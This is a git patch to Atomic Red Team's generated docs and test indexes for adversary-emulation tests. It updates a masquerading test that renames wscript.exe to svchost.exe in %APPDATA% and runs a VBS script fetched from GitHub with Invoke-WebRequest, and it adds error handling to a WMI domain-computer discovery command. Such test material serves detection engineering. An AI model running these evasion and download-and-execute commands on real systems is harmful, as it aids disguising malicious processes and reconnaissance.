From c98b35d245911bbe792d69148e8b3f672aa68994 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Thu, 12 Oct 2023 14:25:00 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/index.yaml         | 23 ++++++++++++++++++-----
 atomics/Indexes/windows-index.yaml | 23 ++++++++++++++++++-----
 atomics/T1018/T1018.md             |  3 ++-
 atomics/T1036.003/T1036.003.md     | 18 ++++++++++++++++--
 4 files changed, 54 insertions(+), 13 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 540f9fb839..908f42941c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -22991,10 +22991,22 @@ defense-evasion:
         Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
       supported_platforms:
       - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Wscript file to execute must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
       executor:
         command: |
           copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
-          cmd.exe /c %APPDATA%\svchost.exe /B
+          cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
         cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 
           '
@@ -23046,7 +23058,8 @@ defense-evasion:
       executor:
         command: |
           copy "#{inputfile}" #{outputfile}
-          $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
+          try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
+          catch { $_; exit $_.Exception.HResult}
           Stop-Process -ID $myT1036_003
         cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
 
@@ -103492,9 +103505,9 @@ discovery:
       executor:
         name: powershell
         elevation_required: false
-        command: 'get-wmiobject -class ds_computer -namespace root\directory\ldap
-
-          '
+        command: |
+          try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
+          catch { $_; exit $_.Exception.HResult }
     - name: Remote System Discovery - net group Domain Controller
       auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
       description: |
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index c50c37051b..93953652e8 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -19788,10 +19788,22 @@ defense-evasion:
         Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
       supported_platforms:
       - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Wscript file to execute must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
       executor:
         command: |
           copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
-          cmd.exe /c %APPDATA%\svchost.exe /B
+          cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
         cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 
           '
@@ -19843,7 +19855,8 @@ defense-evasion:
       executor:
         command: |
           copy "#{inputfile}" #{outputfile}
-          $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
+          try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
+          catch { $_; exit $_.Exception.HResult}
           Stop-Process -ID $myT1036_003
         cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
 
@@ -88397,9 +88410,9 @@ discovery:
       executor:
         name: powershell
         elevation_required: false
-        command: 'get-wmiobject -class ds_computer -namespace root\directory\ldap
-
-          '
+        command: |
+          try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
+          catch { $_; exit $_.Exception.HResult }
     - name: Remote System Discovery - net group Domain Controller
       auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
       description: |
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index ac15077252..35a0863d67 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -757,7 +757,8 @@ Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershe
 
 
 ```powershell
-get-wmiobject -class ds_computer -namespace root\directory\ldap
+try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
+catch { $_; exit $_.Exception.HResult }
 ```
 
 
diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md
index 1d62354569..f6490fa67d 100644
--- a/atomics/T1036.003/T1036.003.md
+++ b/atomics/T1036.003/T1036.003.md
@@ -150,7 +150,7 @@ Upon execution, no windows will remain open but wscript will have been renamed t
 
 ```cmd
 copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
-cmd.exe /c %APPDATA%\svchost.exe /B
+cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
 ```
 
 #### Cleanup Commands:
@@ -160,6 +160,19 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 
 
 
+#### Dependencies:  Run with `powershell`!
+##### Description: Wscript file to execute must exist on disk
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
+```
+
+
 
 
 <br/>
@@ -226,7 +239,8 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
 
 ```powershell
 copy "#{inputfile}" #{outputfile}
-$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
+try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
+catch { $_; exit $_.Exception.HResult}
 Stop-Process -ID $myT1036_003
 ```